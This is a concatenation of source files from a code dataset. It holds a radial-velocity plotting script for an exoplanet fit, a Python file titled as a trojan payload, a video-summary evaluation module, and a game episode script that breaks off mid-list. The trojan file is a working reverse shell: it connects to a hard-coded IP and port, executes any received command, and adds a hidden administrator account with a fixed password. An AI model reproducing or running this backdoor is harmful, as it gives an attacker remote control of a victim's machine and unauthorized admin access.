**self.legend_kwargs)\n\n # years on upper axis\n axyrs = ax.twiny()\n xl = np.array(list(ax.get_xlim())) + self.epoch\n decimalyear = Time(xl, format='jd', scale='utc').decimalyear\n axyrs.get_xaxis().get_major_formatter().set_useOffset(False)\n axyrs.set_xlim(*decimalyear)\n axyrs.set_xlabel('Year')\n plt.locator_params(axis='x', nbins=5)\n\n # if not self.yscale_auto:\n # scale = np.std(self.rawresid+self.rvmod)\n # ax.set_ylim(-self.yscale_sigma * scale, self.yscale_sigma * scale)\n\n if isinstance(ylim, tuple):\n ax.set_ylim(ylim)\n\n ax.set_ylabel('RV [{ms:}]'.format(**plot.latex))\n ax.set_xlabel('Time [JD - {:d}]'.format(int(np.round(self.epoch))))\n # ticks = ax.yaxis.get_majorticklocs()\n # ax.yaxis.set_ticks(ticks[1:])\n\n ax.get_yaxis().set_tick_params(which='both', direction='in')\n ax.get_xaxis().set_tick_params(which='both', direction='in')\n ax.tick_params(right=True, which='both', direction='in')\n axyrs.get_xaxis().set_tick_params(which='both', direction='in')\n\n def plot_residuals(self):\n \"\"\"\n Make a plot of residuals and RV trend in the current Axes.\n \"\"\"\n\n ax = plt.gca()\n\n ax.plot(self.mplttimes, self.slope, 'k-', lw=self.fit_linewidth)\n\n mtelplot(self.plttimes, self.resid, self.rverr, self.post.likelihood.telvec, ax, telfmts=self.telfmts)\n if not self.yscale_auto:\n scale = np.std(self.resid)\n ax.set_ylim(-self.yscale_sigma * scale, self.yscale_sigma * scale)\n\n if self.highlight_last:\n ind = np.argmax(self.plttimes)\n plt.plot(self.plttimes[ind], self.resid[ind], **plot.highlight_format)\n\n if self.set_xlim is not None:\n ax.set_xlim(self.set_xlim)\n else:\n ax.set_xlim(min(self.plttimes)-0.01*self.dt, max(self.plttimes)+0.01*self.dt)\n\n ##########################################\n # what would explain the Pdot from transits?\n period = 1.338231466*units.day\n Pdot_tra = -2.736e-10\n Pdot_err = 2**(1/2.)*2.83e-11 # inflating appropriately\n Pdot_tra_perr = Pdot_tra + Pdot_err\n Pdot_tra_merr = Pdot_tra - Pdot_err\n dvdt_tra = (Pdot_tra * const.c / period).to(\n (units.m/units.s)/units.day).value\n dvdt_tra_perr = (Pdot_tra_perr * const.c / period).to(\n (units.m/units.s)/units.day).value\n dvdt_tra_merr = (Pdot_tra_merr * const.c / period).to(\n (units.m/units.s)/units.day).value\n\n # model times are now an arrow band\n _mtimes = np.linspace(np.min(self.plttimes)+3500,\n np.min(self.plttimes)+4000, num=2000)\n _mbase = np.nanmedian(_mtimes)\n model_tra_line = dvdt_tra*(_mtimes-_mbase)\n model_tra_merr = dvdt_tra_merr*(_mtimes-_mbase)# + curv*(_times-time_base)**2\n model_tra_perr = dvdt_tra_perr*(_mtimes-_mbase)# + curv*(_times-time_base)**2\n\n yoffset = 35\n ax.plot(_mtimes, model_tra_line+yoffset,\n color='purple', zorder=-3, lw=0.5, ls='-', linewidth=self.fit_linewidth)\n #ax.fill_between(_mtimes, model_tra_merr+yoffset, model_tra_perr+yoffset,\n # color='purple', zorder=-4, alpha=0.9, lw=0)\n ax.text(0.92, 0.85, 'Slope = $c\\dot{P}/P$', va='top', ha='right',\n transform=ax.transAxes, color='purple', alpha=0.9,\n fontsize='large')\n\n ##########################################\n\n ticks = ax.yaxis.get_majorticklocs()\n ax.yaxis.set_ticks([ticks[0], 0.0, ticks[-1]])\n plt.xlabel('Time [JD - {:d}]'.format(int(np.round(self.epoch))))\n ax.set_ylabel('Residuals [{ms:}]'.format(**plot.latex))\n ax.yaxis.set_major_locator(MaxNLocator(5, prune='both'))\n\n ax.get_yaxis().set_tick_params(which='both', direction='in')\n ax.get_xaxis().set_tick_params(which='both', direction='in')\n ax.tick_params(right=True, which='both', direction='in')\n ax.tick_params(top=True, which='both', direction='in')\n\n\n def plot_phasefold(self, pltletter, pnum):\n \"\"\"\n Plot phased orbit plots for each planet in the fit.\n\n Args:\n pltletter (int): integer representation of\n letter to be printed in the corner of the first\n phase plot.\n Ex: ord(\"a\") gives 97, so the input should be 97.\n pnum (int): the number of the planet to be plotted. Must be\n the same as the number used to define a planet's\n Parameter objects (e.g. 'per1' is for planet #1)\n\n \"\"\"\n\n ax = plt.gca()\n\n if len(self.post.likelihood.x) < 20:\n self.nobin = True\n\n bin_fac = 1.75\n bin_markersize = bin_fac * rcParams['lines.markersize']\n bin_markeredgewidth = bin_fac * rcParams['lines.markeredgewidth']\n\n rvmod2 = self.model(self.rvmodt, planet_num=pnum) - self.slope\n modph = t_to_phase(self.post.params, self.rvmodt, pnum, cat=True) - 1\n rvdat = self.rawresid + self.model(self.rvtimes, planet_num=pnum) - self.slope_low\n phase = t_to_phase(self.post.params, self.rvtimes, pnum, cat=True) - 1\n rvdatcat = np.concatenate((rvdat, rvdat))\n rverrcat = np.concatenate((self.rverr, self.rverr))\n rvmod2cat = np.concatenate((rvmod2, rvmod2))\n bint, bindat, binerr = fastbin(phase+1, rvdatcat, nbins=25)\n bint -= 1.0\n\n ax.axhline(0, color='k', linestyle=':', linewidth=1)\n ax.plot(sorted(modph), rvmod2cat[np.argsort(modph)], 'k-', linewidth=self.fit_linewidth)\n #plot.labelfig(pltletter)\n\n telcat = np.concatenate((self.post.likelihood.telvec, self.post.likelihood.telvec))\n\n if self.highlight_last:\n ind = np.argmax(self.rvtimes)\n hphase = t_to_phase(self.post.params, self.rvtimes[ind], pnum, cat=False)\n if hphase > 0.5:\n hphase -= 1\n plt.plot(hphase, rvdatcat[ind], **plot.highlight_format)\n\n mtelplot(phase, rvdatcat, rverrcat, telcat, ax, telfmts=self.telfmts)\n if not self.nobin and len(rvdat) > 10:\n pass\n #ax.errorbar(\n # bint, bindat, yerr=binerr, fmt='ro', mec='w', ms=bin_markersize,\n # mew=bin_markeredgewidth\n #)\n\n if self.phase_limits:\n ax.set_xlim(self.phase_limits[0], self.phase_limits[1])\n else:\n ax.set_xlim(-0.5, 0.5)\n\n if not self.yscale_auto:\n scale = np.std(rvdatcat)\n ax.set_ylim(-self.yscale_sigma*scale, self.yscale_sigma*scale)\n ax.set_ylim((-510, 510))\n\n keys = [p+str(pnum) for p in ['per', 'k', 'e']]\n\n labels = [self.post.params.tex_labels().get(k, k) for k in keys]\n if pnum < self.num_planets:\n ticks = ax.yaxis.get_majorticklocs()\n ax.yaxis.set_ticks(ticks[1:-1])\n\n ax.set_ylabel('RV [{ms:}]'.format(**plot.latex))\n ax.set_xlabel('Phase')\n\n ax.get_yaxis().set_tick_params(which='both', direction='in')\n ax.get_xaxis().set_tick_params(which='both', direction='in')\n ax.tick_params(right=True, which='both', direction='in')\n ax.tick_params(top=True, which='both', direction='in')\n\n print_params = ['per', 'k', 'e']\n units = {'per': 'days', 'k': plot.latex['ms'], 'e': ''}\n\n anotext = []\n for l, p in enumerate(print_params):\n val = self.post.params[\"%s%d\" % (print_params[l], pnum)].value\n\n if self.uparams is None:\n _anotext = '$\\\\mathregular{%s}$ = %4.2f %s' % (labels[l].replace(\"$\", \"\"), val, units[p])\n else:\n if hasattr(self.post, 'medparams'):\n val = self.post.medparams[\"%s%d\" % (print_params[l], pnum)]\n else:\n print(\"WARNING: medparams attribute not found in \" +\n \"posterior object will annotate with \" +\n \"max-likelihood values and reported uncertainties \" +\n \"may not be appropriate.\")\n err = self.uparams[\"%s%d\" % (print_params[l], pnum)]\n if err > 1e-15:\n val, err, errlow = sigfig(val, err)\n _anotext = '$\\\\mathregular{%s}$ = %s $\\\\mathregular{\\\\pm}$ %s %s' \\\n % (labels[l].replace(\"$\", \"\"), val, err, units[p])\n else:\n _anotext = '$\\\\mathregular{%s}$ = %4.2f %s' % (labels[l].replace(\"$\", \"\"), val, units[p])\n\n anotext += [_anotext]\n\n #anotext = '\\n'.join(anotext)\n anotext = anotext[1] # just the semi-amplitude\n logk1_limit = 4.68726682\n #anotext = (\n # f'K < {np.exp(logk1_limit):.1f}' +' m$\\,$s$^{-1}$ (3$\\sigma$)\\n'\n # '$M_{\\mathrm{p}} \\sin i < 1.20\\,M_{\\mathrm{Jup}}$'\n #)\n anotext = (\n #f'K < {np.exp(logk1_limit):.1f}' +' m$\\,$s$^{-1}$ (3$\\sigma$)\\n'\n '$M_{\\mathrm{p}} \\sin i < 1.20\\,M_{\\mathrm{Jup}}\\ (3\\sigma)$'\n )\n\n add_anchored(\n anotext, loc='lower left', frameon=True, prop=dict(size=self.phasetext_size),\n bbox=dict(ec='none', fc='w', alpha=0.8)\n )\n\n\n def plot_multipanel(self, nophase=False, letter_labels=False):\n \"\"\"\n Provision and plot an RV multipanel plot\n\n Args:\n nophase (bool, optional): if True, don't\n include phase plots. Default: False.\n letter_labels (bool, optional): if True, include\n letter labels on orbit and residual plots.\n Default: True.\n\n Returns:\n tuple containing:\n - current matplotlib Figure object\n - list of Axes objects\n \"\"\"\n\n if nophase:\n scalefactor = 1\n else:\n scalefactor = self.phase_nrows\n\n figheight = self.ax_rv_height + self.ax_phase_height * scalefactor\n\n # provision figure\n fig = plt.figure(figsize=(self.figwidth, figheight+1.0))\n\n fig.subplots_adjust(left=0.12, right=0.95)\n gs_rv = gridspec.GridSpec(1, 1, height_ratios=[1.])\n\n divide = 1 - self.ax_rv_height / figheight\n gs_rv.update(left=0.12, right=0.93, top=0.93,\n bottom=divide+self.rv_phase_space*0.5, hspace=0.)\n\n # orbit plot\n ax_rv = plt.subplot(gs_rv[0, 0])\n self.ax_list += [ax_rv]\n\n plt.sca(ax_rv)\n self.plot_timeseries()\n pltletter = ord('a')\n if letter_labels:\n plot.labelfig(pltletter)\n pltletter += 1\n\n # # residuals\n # ax_resid = plt.subplot(gs_rv[1, 0])\n # self.ax_list += [ax_resid]\n\n # plt.sca(ax_resid)\n # self.plot_residuals()\n # if letter_labels:\n # plot.labelfig(pltletter)\n # pltletter += 1\n\n # phase-folded plots\n if not nophase:\n gs_phase = gridspec.GridSpec(self.phase_nrows, self.phase_ncols)\n\n if self.phase_ncols == 1:\n gs_phase.update(left=0.12, right=0.93,\n top=divide - self.rv_phase_space * 0.5,\n bottom=0.07, hspace=0.003)\n else:\n gs_phase.update(left=0.12, right=0.93,\n top=divide - self.rv_phase_space * 0.5,\n bottom=0.07, hspace=0.25, wspace=0.25)\n\n for i in range(self.num_planets):\n i_row = int(i / self.phase_ncols)\n i_col = int(i - i_row * self.phase_ncols)\n ax_phase = plt.subplot(gs_phase[i_row, i_col])\n self.ax_list += [ax_phase]\n\n plt.sca(ax_phase)\n self.plot_phasefold(pltletter, i+1)\n pltletter += 1\n\n if self.saveplot is not None:\n fig.tight_layout(w_pad=2, h_pad=2)\n plt.savefig(self.saveplot, dpi=150, bbox_inches='tight')\n print(\"RV multi-panel plot saved to %s\" % self.saveplot)\n\n return fig, self.ax_list\n\n\ndef telplot(x, y, e, tel, ax, lw=1., telfmt={}, rms=0):\n \"\"\"Plot data from from a single telescope\n\n x (array): Either time or phase\n y (array): RV\n e (array): RV error\n tel (string): telecsope string key\n ax (matplotlib.axes.Axes): current Axes object\n lw (float): line-width for error bars\n telfmt (dict): dictionary corresponding to kwargs\n passed to errorbar. Example:\n\n telfmt = dict(fmt='o',label='HIRES',color='red')\n \"\"\"\n\n # Default formatting\n kw = dict(\n fmt='o', capsize=0, mew=0,\n ecolor='0.6', lw=lw, color='orange',\n )\n\n # If not explicit format set, look among default formats\n if not telfmt and tel in telfmts_default:\n telfmt = telfmts_default[tel]\n\n for k in telfmt:\n kw[k] = telfmt[k]\n\n if not 'label' in kw.keys():\n if tel in telfmts_default:\n kw['label'] = telfmts_default[tel]['label']\n else:\n kw['label'] = tel\n\n if rms:\n kw['label'] += '\\nRMS={:.2f} {:s}'.format(rms, latex['ms'])\n\n plt.errorbar(x, y, yerr=e, **kw)\n\n\ndef mtelplot(x, y, e, tel, ax, lw=1., telfmts={}, **kwargs):\n \"\"\"\n Overplot data from from multiple telescopes.\n\n x (array): Either time or phase\n y (array): RV\n e (array): RV error\n tel (array): array of telecsope string keys\n ax (matplotlib.axes.Axes): current Axes object\n telfmts (dict): dictionary of dictionaries corresponding to kwargs\n passed to errorbar. Example:\n\n telfmts = {\n 'hires': dict(fmt='o',label='HIRES'),\n 'harps-n' dict(fmt='s')\n }\n \"\"\"\n\n rms_values = kwargs.pop('rms_values', False)\n\n utel = np.unique(tel)\n\n ci = 0\n for t in utel:\n xt = x[tel == t]\n yt = y[tel == t]\n et = e[tel == t]\n\n telfmt = {}\n\n if t in telfmts:\n telfmt = telfmts[t]\n if 'color' not in telfmt:\n telfmt['color'] = default_colors[ci]\n ci +=1\n elif t not in telfmts and t not in telfmts_default:\n telfmt = dict(color=default_colors[ci])\n ci +=1\n else:\n telfmt = {}\n\n if rms_values:\n rms = rms_values[t]\n else:\n rms = 0\n\n telplot(xt, yt, et, t, ax, lw=1., telfmt=telfmt, rms=rms)\n\n ax.yaxis.set_major_formatter(\n matplotlib.ticker.ScalarFormatter(useOffset=False)\n )\n ax.xaxis.set_major_formatter(\n matplotlib.ticker.ScalarFormatter(useOffset=False)\n )\n\n\ndef add_anchored(*args, **kwargs):\n \"\"\"\n Add text at a particular location in the current Axes\n\n Args:\n s (string): text\n loc (string): location code\n pad (float [optional]): pad between the text and the frame\n as fraction of the font size\n borderpad (float [optional]): pad between the frame and the axes (or *bbox_to_anchor*)\n prop (matplotlib.font_manager.FontProperties): font properties\n \"\"\"\n\n bbox = {}\n if 'bbox' in kwargs:\n bbox = kwargs.pop('bbox')\n at = AnchoredText(*args, **kwargs)\n if len(bbox.keys()) > 0:\n plt.setp(at.patch, **bbox)\n\n ax = plt.gca()\n ax.add_artist(at)\n\n\ndef plot_rvs():\n\n setupfn = \"/home/luke/Dropbox/proj/timmy/drivers/radvel_drivers/TOI837.py\"\n outputdir = \"/home/luke/Dropbox/proj/timmy/results/radvel_fitting/20200624_simple_planet\"\n\n if not os.path.exists(outputdir):\n os.mkdir(outputdir)\n\n args = args_object(setupfn, outputdir)\n\n # plot the upper limit (99.7th pctile) fit, which has already been\n # performed in 20200624_simple_planet\n args.type = ['rv']\n limit_plots(args) # pulled from radvel.driver.plots\n\n\nif __name__ == \"__main__\":\n plot_rvs()\n","sub_path":"drivers/plot_rvs.py","file_name":"plot_rvs.py","file_ext":"py","file_size_in_byte":28533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"268849648","text":"##\n# SIMPLE PAYLOAD FOR TROJAN PYTHON \n#@author - Jerome Themee - security analyst \n#@date - 16/07/2015\n##\nimport socket\nimport subprocess\n\n# target\ntarget_host = \"10.94.71.26\"\ntarget_port = 9004\nlocalIp = socket.gethostbyname(socket.gethostname())\n\n# create the socket object with python\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.connect((target_host,target_port))\n\n#run command function\ndef run_command(cmd):\n '''given shell command, returns communication tuple of stdout and stderr'''\n return subprocess.Popen(cmd,\n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE, \n stdin=subprocess.PIPE).communicate()\n\n\nwhile 1 :\n\n response = client.recv(4096)\n\n if response==\"1\":\n outputCommand = run_command(\"ipconfig\")[0]\n client.send(outputCommand)\n\n elif response == \"2\":\n outputCommand = run_command(\"net user kali Azerty123456 /add\")[0]\n outputCommand = run_command(\"net localgroup administrateurs kali /add\")[0]\n client.send(\"Compte cree kali Azerty123456 \")\n\n elif response == \"3\":\n outputCommand = run_command(\"powershell.exe -command Invoke-WebResquest https\")[0]\n client.send(\"Compte cree kali Azerty123456 \")\n\n elif response == \"4\":\n outputCommand = run_command(\"net user kali Azerty123456 /add\")[0]\n outputCommand = run_command(\"net localgroup administrateurs kali /add\")[0]\n client.send(\"Compte cree kali Azerty123456 \")\n\n else :\n outputCommand = run_command(response)[0]\n client.send(outputCommand)\n\n\n","sub_path":"trojan/payload2.py","file_name":"payload2.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"284461035","text":"import torch\n\nimport numpy as np\nfrom scipy import interpolate\n\nfrom knapsack_solver import knapsack\n\nfrom scipy.stats import kendalltau, spearmanr\nfrom scipy.stats import rankdata\n\nfrom sklearn.metrics import precision_recall_fscore_support\n\nimport sys\n\ndef eval_metrics(y_pred, y_true):\n precision, recall, fscore, _ = precision_recall_fscore_support(y_true, y_pred, average='binary', zero_division=0)\n return precision, recall, fscore\n\n\ndef select_keyshots(video_info, pred_score, inter_method = \"upsample\"):\n \"\"\"\n input:\n video_info: specific video of *.h5 file\n pred_score: [320] key frame score in every frames\n \"\"\"\n\n N = video_info['length'][()] # scalar, video original length\n cps = video_info['change_points'][()] # shape [n_segments,2], stores begin and end of each segment in original length index\n\n pred_score = pred_score.to(\"cpu\").detach().numpy() # GPU->CPU, requires_grad=False, to numpy\n \n if inter_method == \"upsample\":\n pred_score = upsample(pred_score, N)\n elif inter_method == \"cut\":\n pred_score = cut(pred_score, N)\n\n pred_score_key_frames = (pred_score > 0.5) # convert to key frames\n\n value = np.array([pred_score_key_frames[cp[0]:(cp[1])].mean() for cp in cps]) # [n_segments]\n # weight = video_info['n_frame_per_seg'][()] # shape [n_segments], number of frames in each segment\n weight = np.ones((cps.shape[0]), dtype=int)\n\n _, selected = knapsack(list(zip(value, weight)), 2) \n # _, selected = knapsack(list(zip(value, weight)), int(0.15*N)) # selected -> [66, 64, 51, 50, 44, 41, 40, 38, 34, 33, 31, 25, 24, 23, 20, 10, 9]\n selected = selected[::-1] # inverse the selected list, which seg is selected\n key_shots = np.zeros(shape=(N, ))\n for i in selected:\n key_shots[cps[i][0]:(cps[i][1])] = 1 # assign 1 to seg\n \n return pred_score.tolist(), key_shots\n\ndef upsample(pred_score, N):\n \"\"\"\n Use Nearest Neighbor to extend from 320 to N\n input: \n pred_score: shape [320], indicates key frame prob.\n N: scalar, video original length\n output\n up_arr: shape [N]\n \"\"\"\n x = np.linspace(0, len(pred_score)-1, len(pred_score))\n f = interpolate.interp1d(x, pred_score, kind='nearest')\n x_new = np.linspace(0, len(pred_score)-1, N); #print(x_new, N)\n up_arr = f(x_new)\n\n return up_arr\n\ndef cut(arr, N):\n return arr[:N]\n\ndef rankcorrelation_kendall(y_pred, y_true):\n return kendalltau(rankdata(-y_true), rankdata(-y_pred))[0]\n\ndef rankcorrelation_spearman(y_pred, y_true):\n return spearmanr(y_true, y_pred)\n\n\nif __name__ == \"__main__\":\n device = torch.device(\"cuda:0\")\n\n import h5py\n data_file = h5py.File(\"datasets/fcsn_tvsum.h5\")\n video_info = data_file[\"video_1\"]\n pred_score = torch.randn((320,), requires_grad=True)\n pred_score = pred_score.to(device)\n select_keyshots(video_info, pred_score)\n","sub_path":"eval_tools.py","file_name":"eval_tools.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"142350114","text":"###############################################################################\n# Episode2.py\n#\n# Episode level script. Holds variables and functions global to Episode\n#\n# Created 11-13-00\tJess VanDerwalker\n###############################################################################\nimport App\nimport MissionLib\n\n# For debugging\n#kDebugObj = App.CPyDebug()\n\n\n# Declare global variables\nTRUE\t= 1\nFALSE\t= 0\n\ng_bKaroonDestroyed = None\n\n################################################################################\n##\tInitialize()\n##\t\n## Called once when episode loads to initialize episode\n##\t\n##\tArgs: \tpEpisode\t- The episode object\n##\t\n##\tReturn: None\n################################################################################\ndef Initialize(pEpisode):\n\tApp.g_kUtopiaModule.LoadEpisodeSounds(\"Episode 2\")\n\n\t\"Called Initialize and activate an Episode\"\t\n\t\n\t# Initialize our global variables\n\tglobal g_bKaroonDestroyed\n\tg_bKaroonDestroyed = FALSE\n\t\n\t# Set our Episode level TGL\n\tpEpisode.SetDatabase(\"data/TGL/Maelstrom/Episode 2/Episode2.tgl\")\n\t\n\t#\n\t# Setup music for this episode.\n\t#\n\tSetupMusic()\n\n\t#\n\t# Start in the default mission of this episode.\n\t#\n\tpMissionStartEvent = App.TGEvent_Create()\n\tpMissionStartEvent.SetEventType(App.ET_MISSION_START)\n\tpMissionStartEvent.SetDestination(pEpisode)\n\n\t# Start in the default mission of this episode.\n\t# Check if there is a mission override, and if so, then\n\t# use it.\n\tpcOverride = App.g_kVarManager.GetStringVariable(\"Options\", \"MissionOverride\")\n\n\tif (pcOverride != \"\"):\n\t\tpEpisode.LoadMission(\"Maelstrom.Episode2.\" + pcOverride + \".\" + pcOverride, pMissionStartEvent)\n\t\tApp.g_kVarManager.SetStringVariable(\"Options\", \"MissionOverride\", \"\")\n\telse:\n\t\tpEpisode.LoadMission(\"Maelstrom.Episode2.E2M0.E2M0\", pMissionStartEvent)\n\t\n################################################################################\n##\tE2M1KrellSOS()\n##\n##\tCreates the sets, play the SOS from the Krell.\n##\n##\tArgs:\tNone\n##\n##\tReturn:\tNone\n################################################################################\ndef E2M1KrellSOS():\n#\tkDebugObj.Print(\"E2M1 Krell SOS sequence.\")\n\t# Create the Cardassian bridge\n\tpCardSet = MissionLib.SetupBridgeSet(\"CardSet\", \"data/Models/Sets/Cardassian/cardbridge.nif\", -30, 65, -1.55)\n\tpCardCapt = MissionLib.SetupCharacter(\"Bridge.Characters.CardCapt\", \"CardSet\")\n\tpCardCapt.SetHidden(1)\n\n\t\n\tpMission = MissionLib.GetMission()\n\tif (pMission == None):\n\t\treturn\n\tpMissionDatabase = pMission.SetDatabase(\"data/TGL/Maelstrom/Episode 2/E2M1.TGL\")\n\t\n\t# Do the SOS sequence.\n\tpSequence = App.TGSequence_Create()\n\t\n\tpBridge\t\t= App.g_kSetManager.GetSet(\"bridge\")\n\tpCardSet\t= App.g_kSetManager.GetSet(\"CardSet\")\n\t\n\tpSaffi\t\t= App.CharacterClass_GetObject(pBridge, \"XO\")\n\tpKiska\t\t= App.CharacterClass_GetObject(pBridge, \"Helm\")\n\tpCardCapt\t= App.CharacterClass_GetObject(pCardSet, \"CardCapt\")\n\t\n\tpKiskaSOS1\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS1\", None, 0, pMissionDatabase)\n\tpKiskaSOS2\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS2\", None, 0, pMissionDatabase)\n\tpKiskaSOS3\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS3\", \"Captain\", 1, pMissionDatabase)\n\tpCommOn\t\t\t= App.TGSoundAction_Create(\"ViewOn\")\n\tpCardCaptSOS5\t= App.TGScriptAction_Create(\"MissionLib\", \"SubtitledLine\", pMissionDatabase, \"E2M1SOS5\")\n\tpKiskaSOS6\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS6\", \"Captain\", 1, pMissionDatabase)\n\tpSaffiSOS4\t\t= App.CharacterAction_Create(pSaffi, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS4\", None, 0, pMissionDatabase)\n\tpCardViewOn\t\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOn\", \"CardSet\", \"CardCapt\")\n\tpCardCaptSOS8\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS8\", None, 0, pMissionDatabase)\n\tpCardCaptSOS9\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS9\", None, 0, pMissionDatabase)\n\tpCardCaptSOS10\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS10\", None, 0, pMissionDatabase)\n\tpSaffiSOS11\t\t= App.CharacterAction_Create(pSaffi, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS11\", None, 0, pMissionDatabase)\n\tpCardCaptSOS12\t= App.CharacterAction_Create(pCardCapt, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS12\", None, 0, pMissionDatabase)\n\tpViewOff\t\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOff\")\n\tpKiskaSOS13\t\t= App.CharacterAction_Create(pKiska, App.CharacterAction.AT_SAY_LINE, \"E2M1SOS13\", \"Captain\",0, pMissionDatabase)\n\t\n\t\n\tpSequence.AppendAction(pKiskaSOS1)\n\tpSequence.AppendAction(pKiskaSOS2)\n\tpSequence.AppendAction(pKiskaSOS3)\n\tpSequence.AppendAction(pCommOn)\n\tpSequence.AppendAction(pCardCaptSOS5)\n\tpSequence.AppendAction(pKiskaSOS6)\n\tpSequence.AppendAction(pSaffiSOS4)\n\tpSequence.AppendAction(pCardViewOn)\n\tpSequence.AppendAction(pCardCaptSOS8)\n\tpSequence.AppendAction(pCardCaptSOS9)\n\tpSequence.AppendAction(pCardCaptSOS10)\n\tpSequence.AppendAction(pSaffiSOS11)\n\tpSequence.AppendAction(pCardCaptSOS12)\n\tpSequence.AppendAction(pViewOff)\n\tpSequence.AppendAction(pKiskaSOS13)\n\t\n\tpSequence.Play()\n\n\t# Get the Episode and register our Aid Krell Goal\n\t# Remove the SupplyGeki goal if it's still there\n\tMissionLib.AddGoal(\"E2AidKrellGoal\")\n\n################################################################################\n##\tE2M3Briefing()\n##\n##\tPlays the briefing and links us to Episode 2 Mission 3.\n##\n##\tArgs:\tNone\n##\n##\tReturn:\tNone\n################################################################################\ndef E2M3Briefing():\n#\tkDebugObj.Print(\"Starting E2M3\")\n\t# Set the TGL for the mission and load the sounds\n\t# that we need.\n\tpMission = MissionLib.GetMission()\n\tif (pMission == None):\n\t\treturn\n\tpMissionDatabase = pMission.SetDatabase(\"data/TGL/Maelstrom/Episode 2/E2M3.TGL\")\n\t\t\n\t# Do our intro sequence\n\tpBridge\t\t= App.g_kSetManager.GetSet(\"bridge\")\n\tpStarbase\t= App.g_kSetManager.GetSet(\"StarbaseSet\")\n\t\n\tpFelix\t= App.CharacterClass_GetObject(pBridge, \"Tactical\")\n\tpLiu\t= App.CharacterClass_GetObject(pStarbase, \"Liu\")\n\t\n\tpSequence = App.TGSequence_Create()\n\t\n\tpFelixLine027\t= App.CharacterAction_Create(pFelix, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing1\", \"Captain\", 1, pMissionDatabase)\n\tpStarbaseViewOn\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOn\", \"StarbaseSet\", \"Liu\")\n\tpLiuLine028\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing2\", None, 0, pMissionDatabase)\n\tpLiuLine029\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing3\", None, 0, pMissionDatabase)\n\tpLiuLine030\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing4\", None, 0, pMissionDatabase)\n\tpLiuLine031\t\t= App.CharacterAction_Create(pLiu, App.CharacterAction.AT_SAY_LINE, \"E2M3Briefing5\", None, 0, pMissionDatabase)\n\tpViewOff\t\t= App.TGScriptAction_Create(\"MissionLib\", \"ViewscreenOff\")\n\t\n\tpSequence.AddAction(pFelixLine027)\n\tpSequence.AddAction(pStarbaseViewOn, pFelixLine027)\n\tpSequence.AddAction(pLiuLine028, pStarbaseViewOn)\n\tpSequence.AddAction(pLiuLine029, pLiuLine028)\n\tpSequence.AddAction(pLiuLine030, pLiuLine029)\n\tpSequence.AddAction(pLiuLine031, pLiuLine030)\n\tpSequence.AddAction(pViewOff, pLiuLine031)\n\t\n\tpSequence.Play()\n\t\n\t# Link the warp button to the new menu\n\timport Systems.Vesuvi.Vesuvi\n\tpVesuviMenu = Systems.Vesuvi.Vesuvi.CreateMenus()\n\n\t# Set the mission name for the button\n\tpVesuviMenu.SetMissionName(\"Maelstrom.Episode2.E2M3.E2M3\")\n\n\t# Remove our goal to Supply Vesuvi 5 and add the \n\t# Head to Vesuvi 6 goal\n\tMissionLib.RemoveGoal(\"E2SupplyCeli5Goal\")\n\tMissionLib.AddGoal(\"E2HeadToCeli6Goal\")\n\n################################################################################\n##\tSetupMusic\n##\n##\tSet the music to this episode's music.\n##\n##\tArgs:\tNone\n##\n##\tReturn:\tNone\n################################################################################\ndef SetupMusic():\n\timport DynamicMusic\n\tDynamicMusic.ChangeMusic(\n\t\t# Base songs/fanfares to use as music...\n\t\t((\"sfx/Music/Episode 2.mp3\", \"Starting Ambient\"),\n\t\t(\"sfx/Music/Starbase12.mp3\", \"Starbase12 Ambient\"),\n\t\t(\"sfx/Music/Nebula 1.mp3\", \"Nebula Ambient\"),\n\t\t(\"sfx/Music/Cutscene_Generic.mp3\", \"Generic Cutscene\"),\n\t\t(\"sfx/Music/EpisGen1.mp3\", \"Generic Episode 1\"),\n\t\t(\"sfx/Music/EpisGen2.mp3\", \"Generic Episode 2\"),\n\t\t(\"sfx/Music/EpisGen3.mp3\", \"Generic Episode 3\"),\n\t\t(\"sfx/Music/Panic-9a.mp3\", \"Cbt Panic 1\"),\n\t\t(\"sfx/Music/Panic-9b.mp3\", \"Cbt Panic 2\"),\n\t\t(\"sfx/Music/Panic-9c.mp3\", \"Cbt Panic 3\"),\n\t\t(\"sfx/Music/Panic-9d.mp3\", \"Cbt Panic 4\"),\n\t\t(\"sfx/Music/Panic-9e.mp3\", \"Cbt Panic 5\"),\n\t\t(\"sfx/Music/Panic-9f.mp3\", \"Cbt Panic 6\"),\n\t\t(\"sfx/Music/Panic-9g.mp3\", \"Cbt Panic 7\"),\n\t\t(\"sfx/Music/Neutral-10i.mp3\", \"Cbt Neutral 1\"),\n\t\t(\"sfx/Music/Neutral-10b.mp3\", \"Cbt Neutral 2\"),\n\t\t(\"sfx/Music/Neutral-10c.mp3\", \"Cbt Neutral 